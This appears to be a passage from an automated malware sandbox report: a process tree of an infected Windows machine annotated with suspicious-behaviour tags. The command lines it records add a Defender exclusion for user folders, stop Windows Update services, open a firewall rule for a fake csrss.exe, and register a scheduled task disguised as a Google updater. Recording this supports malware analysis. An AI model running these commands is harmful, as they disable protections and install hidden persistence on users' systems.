    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4656
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:3396
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,11974878006540946169,15556957269906592050,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        6⤵
        
        PID:6316
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,11974878006540946169,15556957269906592050,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2524 /prefetch:3
        6⤵
        
        PID:7188
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4984
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x108,0x16c,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:432
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,13935433978212086135,17522252053830839957,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
        6⤵
        
        PID:6324
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,13935433978212086135,17522252053830839957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 /prefetch:3
        6⤵
        
        PID:7220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4952
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:4528
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,2439896649659942060,11757287610851329234,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
        6⤵
        
        PID:6284
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,2439896649659942060,11757287610851329234,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
        6⤵
        
        PID:5752
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2128
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:3840
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,17445288582550325455,8980883345693739501,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
        6⤵
        
        PID:6292
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,17445288582550325455,8980883345693739501,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2728
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:3512
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,2373338196454426423,3071613537857354620,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
        6⤵
        
        PID:6308
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,2373338196454426423,3071613537857354620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4328
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:3640
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,7561297340819153365,14968767536026893256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        6⤵
        
        PID:6332
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,7561297340819153365,14968767536026893256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
        6⤵
        
        PID:7180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2492
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        6⤵
        
        PID:3748
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,2402907385923176510,3467238389183697656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3088
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2YG1412.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2YG1412.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1664
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:1376
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 540
        6⤵
        Program crash
        
        PID:5684
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3LI13Te.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3LI13Te.exe
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:5404
- C:\Users\Admin\AppData\Local\Temp\3B8D.exe
  C:\Users\Admin\AppData\Local\Temp\3B8D.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:6060
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    - Executes dropped EXE
    PID:5260
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2240
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4912
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:5628
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:6172
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3908
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      PID:4568
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Modifies data under HKEY_USERS
        
        PID:4780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4888
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:4268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5200
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:6088
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:7300
- C:\Users\Admin\AppData\Local\Temp\3D82.exe
  C:\Users\Admin\AppData\Local\Temp\3D82.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:7040
- C:\Users\Admin\AppData\Local\Temp\3F29.exe
  C:\Users\Admin\AppData\Local\Temp\3F29.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:7204
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 784
    3⤵
    - Program crash
    PID:7064
- C:\Users\Admin\AppData\Local\Temp\41F9.exe
  C:\Users\Admin\AppData\Local\Temp\41F9.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:6768
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 788
    3⤵
    - Program crash
    PID:4152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:7260
- C:\Users\Admin\AppData\Local\Temp\923D.exe
  C:\Users\Admin\AppData\Local\Temp\923D.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2392
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
    3⤵
    PID:4248
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:932
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5320
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:492
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:7464
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4108
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:6740
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2840
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3528
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:6540
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5272
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:6152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:3012
- C:\Users\Admin\AppData\Local\Temp\EC25.exe
  C:\Users\Admin\AppData\Local\Temp\EC25.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6928
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:6040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1928
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff90adb46f8,0x7ff90adb4708,0x7ff90adb4718
        5⤵
        
        PID:1576
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
        5⤵
        
        PID:3052
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
        5⤵
        
        PID:3448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8
        5⤵
        
        PID:2800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
        5⤵
        
        PID:7192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
        5⤵
        
        PID:5388
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1
        5⤵
        
        PID:7184
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1
        5⤵
        
        PID:1232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        5⤵
        
        PID:4108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
        5⤵
        
        PID:1304
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,9375784520763181288,14581793442557182391,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8
        5⤵
        
        PID:3216
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
